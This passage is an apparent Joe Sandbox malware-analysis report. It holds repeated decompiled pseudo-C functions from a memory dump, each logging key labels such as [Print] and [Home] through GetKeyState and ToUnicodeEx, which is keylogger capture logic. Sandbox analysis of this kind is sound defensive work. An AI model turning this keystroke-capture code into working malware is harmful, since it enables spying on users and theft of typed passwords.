								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c859b0
0x00c859b7
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Process], xrefs: 00C859B2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8599F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8599F(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Play]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8599f
0x00c859a6
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Play], xrefs: 00C859A1
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D46, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D46(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Print]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d46
0x00c85d4d
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Print], xrefs: 00C85D48
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D84, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D84(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Right Alt]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d84
0x00c85d8b
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Right Alt], xrefs: 00C85D86

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C859D2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859D2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Select]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c859d2
0x00c859d9
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Select], xrefs: 00C859D4

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C47, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C47(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Home]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c47
